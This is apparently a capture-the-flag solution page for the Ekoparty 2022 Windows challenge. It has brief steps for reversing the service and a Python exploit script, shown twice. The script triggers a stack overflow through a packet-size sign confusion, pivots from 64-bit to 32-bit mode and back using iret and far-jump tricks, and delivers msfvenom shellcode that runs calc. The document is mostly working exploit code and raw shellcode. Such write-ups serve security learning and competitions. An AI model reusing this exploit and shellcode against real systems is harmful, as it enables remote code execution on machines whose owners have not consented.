xct/solve.md Secret

## solve.md

      
    Raw
  

              solve.md
            
          
    Ekoparty2022 Windows Challenge

Find handshake, packet type byte, packet size from reversing
Find that packet size > 0x0f00 can be used to cause a stack overflow when the buffer gets copied onto the stack
Find that overflow can turn packet type from T to X which leads to a basic block that jumps exactly behind our payload
Find that "random" initialization of heap memory is not so random and we can use the iret to transition to 32-bit (we cant use 0x2b and 0x33 since these are bad bytes)
Use jmp 0x33:0x100000xx to get back to 64-bit (https://stackoverflow.com/questions/39310831/implement-x86-to-x64-assembly-code-switch)
Restore stack pointer from rcx
MSF Shellcode

Tested on Win11 21H2

  
## solve.py
#!/usr/bin/env python3

# Author: @xct_de

import sys, socket, struct
p32 = lambda x: struct.pack('<I', x);

TARGET = '192.168.153.223'
PORT = 31415

sc =  b""
#sc += b"\xcc"

# transition from x86 to x64 by using jmp 0x33:0x10000020
sc += b"\xea\x1c\x00\x00\x10\x33\x00" # from 0x10000014 0x1000001c
sc += b"\x48\x89\xC8\x48\x89\xC4" # restore original stack from ref in rcx

# msfvenom -p windows/x64/exec cmd="calc" -f python -b '\x2b\x33'
sc += b"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51"
sc += b"\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52"
sc += b"\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72"
sc += b"\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0"
sc += b"\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
sc += b"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b"
sc += b"\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
sc += b"\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44"
sc += b"\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41"
sc += b"\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
sc += b"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1"
sc += b"\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44"
sc += b"\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44"
sc += b"\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
sc += b"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
sc += b"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41"
sc += b"\x59\x5a\x48\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48"
sc += b"\xba\x01\x00\x00\x00\x00\x00\x00\x00\x48\x8d\x8d"
sc += b"\x01\x01\x00\x00\x41\xba\x31\x8b\x6f\x87\xff\xd5"
sc += b"\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
sc += b"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
sc += b"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89"
sc += b"\xda\xff\xd5\x63\x61\x6c\x63\x00"

p=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
p.connect((TARGET,PORT))

# handshake
p.send(b"Hello\x00")
p.recv(3) # Hi\x00

buf =  b""
buf += b"Eko2022\x00" # cookie
buf += b"T" # packet type
buf += b"\xff\xff" # sign/type confusion leads to stack overflow

# switch from x64 to x86 via iret
iret = b""
iret += p32(0x10000014) 	# rip/eip
iret += p32(0x23) 			  # 33=x64
iret += p32(0x00010202) 	# from debugging
iret += p32(0x10000400) 	# rsp/esp
iret += p32(0x53)			    # 2b=x64

buf += iret
buf += sc
buf += b"A"*(0x0f00-len(iret)-len(sc))
buf += b"X" # X leads to packet type confusion
buf += b"B"*0x07 # we want pops, avoid pushs
p.send(buf)
p.recv(1)
p.close()
	#!/usr/bin/env python3

	# Author: @xct_de

	import sys, socket, struct
	p32 = lambda x: struct.pack('<I', x);

	TARGET = '192.168.153.223'
	PORT = 31415

	sc = b""
	#sc += b"\xcc"

	# transition from x86 to x64 by using jmp 0x33:0x10000020
	sc += b"\xea\x1c\x00\x00\x10\x33\x00" # from 0x10000014 0x1000001c
	sc += b"\x48\x89\xC8\x48\x89\xC4" # restore original stack from ref in rcx

	# msfvenom -p windows/x64/exec cmd="calc" -f python -b '\x2b\x33'
	sc += b"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51"
	sc += b"\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52"
	sc += b"\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72"
	sc += b"\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0"
	sc += b"\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
	sc += b"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b"
	sc += b"\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
	sc += b"\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44"
	sc += b"\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41"
	sc += b"\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
	sc += b"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1"
	sc += b"\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44"
	sc += b"\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44"
	sc += b"\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
	sc += b"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
	sc += b"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41"
	sc += b"\x59\x5a\x48\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48"
	sc += b"\xba\x01\x00\x00\x00\x00\x00\x00\x00\x48\x8d\x8d"
	sc += b"\x01\x01\x00\x00\x41\xba\x31\x8b\x6f\x87\xff\xd5"
	sc += b"\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
	sc += b"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
	sc += b"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89"
	sc += b"\xda\xff\xd5\x63\x61\x6c\x63\x00"

	p=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
	p.connect((TARGET,PORT))

	# handshake
	p.send(b"Hello\x00")
	p.recv(3) # Hi\x00

	buf = b""
	buf += b"Eko2022\x00" # cookie
	buf += b"T" # packet type
	buf += b"\xff\xff" # sign/type confusion leads to stack overflow

	# switch from x64 to x86 via iret
	iret = b""
	iret += p32(0x10000014) # rip/eip
	iret += p32(0x23) # 33=x64
	iret += p32(0x00010202) # from debugging
	iret += p32(0x10000400) # rsp/esp
	iret += p32(0x53) # 2b=x64

	buf += iret
	buf += sc
	buf += b"A"*(0x0f00-len(iret)-len(sc))
	buf += b"X" # X leads to packet type confusion
	buf += b"B"*0x07 # we want pops, avoid pushs
	p.send(buf)
	p.recv(1)
	p.close()